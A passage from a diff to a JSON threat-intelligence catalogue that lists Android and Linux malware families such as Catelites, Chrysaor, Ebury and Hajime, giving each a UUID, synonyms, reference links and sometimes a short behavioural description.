"https://www.youtube.com/watch?v=1LOy0ZyjEOk" + ] + }, + "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", + "value": "Catelites", + "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.charger", + "http://blog.checkpoint.com/2017/01/24/charger-malware/", + "http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html" + ] + }, + "uuid": "6e0545df-8df6-4990-971c-e96c4c60d561", + "value": "Charger", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Pegasus", + "JigglyPuff" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.chrysaor", + "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", + "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", + "https://media.ccc.de/v/33c3-7901-pegasus_internals", + "https://citizenlab.ca/2018/09/hide-and-seek-tracking-nso-groups-pegasus-spyware-to-operations-in-45-countries/" + ] + }, + "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", + "value": "Chrysaor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.clientor", + "https://twitter.com/LukasStefanko/status/1042297855602503681" + ] + }, + "uuid": "c0a48ca3-682d-45bc-805c-e62aecd4c724", + "value": "Clientor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SpyBanker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.connic", + "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" + ] + }, + "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", + "value": "Connic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.cpuminer", + "https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/" + ] + }, + "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", + "value": "Cpuminer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.doublelocker", + "https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/" + ] + }, + "uuid": "10d0115a-00b4-414e-972b-8320a2bb873c", + "value": "DoubleLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dualtoy", + "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.dvmap", + "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/" + ] + }, + "uuid": "e5de818e-d25d-47a8-ab31-55fc992bf91b", + "value": "Dvmap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.exobot", + "https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/" + ] + }, + "uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", + "value": "ExoBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexispy", + "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" + ] + }, + "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "value": "FlexiSpy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "gugi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.flexnet", + "https://twitter.com/LukasStefanko/status/886849558143279104" + ] + }, + "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", + "value": "FlexNet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ghostctrl", + "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" + ] + }, + "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", + "value": "GhostCtrl", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.glancelove", + "https://www.clearskysec.com/glancelove/", + "https://www.haaretz.com/israel-news/hamas-cyber-ops-spied-on-israeli-soldiers-using-fake-world-cup-app-1.6241773", + "https://www.idf.il/en/minisites/hamas/hamas-uses-fake-facebook-profiles-to-target-israeli-soldiers/", + "https://securelist.com/breaking-the-weakest-link-of-the-strongest-chain/77562/", + "https://www.ci-project.org/blog/2017/3/4/arid-viper" + ] + }, + "uuid": "24a709ef-c2e4-45ca-90b6-dfa184472f49", + "value": "GlanceLove", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.hero_rat", + "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" + ] + }, + "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", + "value": "HeroRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.irrat", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" + ] + }, + "uuid": "3e7c6e8c-46fc-4498-a28d-5b3d144c51cf", + "value": "IRRat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.jaderat", + "https://blog.lookout.com/mobile-threat-jaderat" + ] + }, + "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", + "value": "JadeRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.kevdroid", + "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html", + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/" + ] + }, + "uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0", + "value": "KevDroid", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.koler", + "https://twitter.com/LukasStefanko/status/928262059875213312" + ] + }, + "uuid": "4ff34778-de4b-4f48-9184-4975c8ccc3f3", + "value": "Koler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus", + "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/" + ] + }, + "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "value": "Lazarus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lazarus_elf", + "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" + ] + }, + "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", + "value": "Lazarus ELF Backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.loki", + "http://blog.checkpoint.com/2017/03/10/preinstalled-malware-targeting-mobile-users/" + ] + }, + "uuid": "a6f481fe-b6db-4507-bb3c-28f10d800e2f", + "value": "Loki", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.lokibot", + "https://www.threatfabric.com/blogs/lokibot_the_first_hybrid_android_malware.html" + ] + }, + "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", + "value": "LokiBot", + "description": "Android banker Trojan with the standard banking capabilities such as overlays, SMS stealing. It also features ransomware functionality. Note, the network traffic is obfuscated the same way as in Android Bankbot." + }, + { + "meta": { + "synonyms": [ + "ExoBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.marcher", + "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", + "https://www.zscaler.de/blogs/research/android-marcher-continuously-evolving-mobile-malware", + "https://www.clientsidedetection.com/marcher.html", + "https://www.clientsidedetection.com/exobot_v2_update___staying_ahead_of_the_competition.html" + ] + }, + "uuid": "f691663a-b360-4c0d-a4ee-e9203139c38e", + "value": "Marcher", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mazarbot", + "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/", + "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html" + ] + }, + "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", + "value": "MazarBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.mysterybot", + "https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html" + ] + }, + "uuid": "0a53ace4-98ae-442f-be64-b8e373948bde", + "value": "MysteryBot", + "description": "MysteryBot is an Android banking Trojan with overlay capabilities with support for Android 7/8 but also provides other features such as key logging and ransomware functionality." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.omnirat", + "https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/", + "https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co" + ] + }, + "uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5", + "value": "OmniRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Popr-d30" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.popr-d30", + "http://blog.crysys.hu/2017/01/technical-details-on-the-fancy-bear-android-malware-poprd30-apk/", + "http://blog.crysys.hu/2017/03/update-on-the-fancy-bear-android-malware-poprd30-apk/" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.pornhub" + ] + }, + "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", + "value": "Fake Pornhub", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.raxir", + "https://twitter.com/PhysicalDrive0/statuses/798825019316916224" + ] + }, + "uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef", + "value": "Raxir", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", + "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores" + ] + }, + "uuid": "e9aaab46-abb1-4390-b37b-d0457d05b28f", + "value": "RedAlert2", + "description": "RedAlert 2 is an new Android malware used by an attacker to gain access to login credentials of various e-banking apps. The malware works by overlaying a login screen with a fake display that sends the credentials to a C2 server.\r\nThe malware also has the ability to block incoming calls from banks, to prevent the victim of being notified.\r\nAs a distribution vector RedAlert 2 uses third-party app stores and imitates real Android apps like Viber, Whatsapp or fake Adobe Flash Player updates." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", + "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/", + "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", + "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", + "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", + "https://www.govcert.admin.ch/blog/33/the-retefe-saga", + "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html" + ] + }, + "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", + "value": "Retefe", + "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", + "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", + "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" + ] + }, + "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", + "value": "Roaming Mantis", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik", + "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", + "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" + ] + }, + "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", + "value": "Rootnik", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", + "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" + ] + }, + "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", + "value": "Skygofree", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SlemBunk" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", + "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html", + "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html" + ] + }, + "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", + "value": "Slempo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", + "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" + ] + }, + "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", + "value": "Slocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy" + ] + }, + "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", + "value": "SMSspy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker", + "https://news.drweb.com/show/?i=11104&lng=en", + "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" + ] + }, + "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", + "value": "SpyBanker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" + ] + }, + "uuid": "31592c69-d540-4617-8253-71ae0c45526c", + "value": "SpyNote", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent", + "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" + ] + }, + "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", + "value": "StealthAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango", + "https://www.lookout.com/info/stealth-mango-report-ty" + ] + }, + "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", + "value": "Stealth Mango", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", + "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" + ] + }, + "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", + "value": "Svpeng", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher", + "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" + ] + }, + "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", + "value": "Switcher", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" + ] + }, + "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", + "value": "TeleRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar", + "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" + ] + }, + "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", + "value": "TemptingCedar Spyware", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Catelites Android Bot", + "MarsElite Android Bot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", + "http://blog.group-ib.com/cron" + ] + }, + "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", + "value": "TinyZ", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan", + "https://blog.lookout.com/titan-mobile-threat", + "https://www.alienvault.com/blogs/labs-research/delivery-keyboy" + ] + }, + "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327", + "value": "Titan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", + "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", + "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html", + "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", + "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", + "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/" + ] + }, + "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", + "value": "Triada", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", + "https://twitter.com/illegalFawn/status/826775250583035904" + ] + }, + "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", + "value": "Unidentified APK 001", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002" + ] + }, + "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", + "value": "Unidentified APK 002", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", + "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", + "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" + ] + }, + "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", + "value": "Viper RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", + "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/", + "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/" + ] + }, + "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46", + "value": "WireX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", + "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/", + "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/" + ] + }, + "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", + "value": "Xbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", + "https://blog.lookout.com/xrat-mobile-threat" + ] + }, + "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", + "value": "XRat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", + "https://securelist.com/whos-who-in-the-zoo/85394", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf" + ] + }, + "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", + "value": "ZooPark", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Qysly" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", + "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", + "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", + "https://securelist.com/ztorg-from-rooting-to-sms/78775/" + ] + }, + "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", + "value": "Ztorg", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", + "https://news.drweb.com/show/?c=5&i=10193&lng=en" + ] + }, + "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", + "value": "Irc16", + "description": "" + }, + { + "meta": { + "synonyms": [ + "gayfgt", + "Gafgyt", + "qbot", + "torlus", + "lizkebab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", + "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf" + ] + }, + "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", + "value": "Bashlite", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CDorked.A" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", + "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", + "https://blogs.cisco.com/security/linuxcdorked-faqs", + "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", + "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", + "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html" + ] + }, + "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", + "value": "CDorked", + "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", + "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", + "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" + ] + }, + "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", + "value": "Chapro", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", + "https://github.com/pooler/cpuminer" + ] + }, + "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", + "value": "Cpuminer", + "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", + "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", + "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", + "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/" + ] + }, + "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", + "value": "Ebury", + "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" + ] + }, + "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", + "value": "Erebus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", + "https://www.recordedfuture.com/chinese-cyberespionage-operations/" + ] + }, + "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", + "value": "ext4", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", + "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://x86.re/blog/hajime-a-follow-up/", + "http://blog.netlab.360.com/hajime-status-report-en/", + "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", + "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", + "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", + "https://github.com/Psychotropos/hajime_hashes" + ] + }, + "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", + "value": "Hajime", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + ] + }, + "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", + "value": "Hakai", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HNS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", + "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", + "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", + "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", + "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", + "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", + "https://blog.netlab.360.com/hns-botnet-recent-activities-en/" + ] + }, + "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", + "value": "Hide and Seek", + "description": "" + }, + { + "meta": { + "synonyms": [ + "IoTroop", + "Reaper" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", + "https://research.checkpoint.com/new-iot-botnet-storm-coming/", + "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", + "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", + "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" + ] + }, + "uuid": 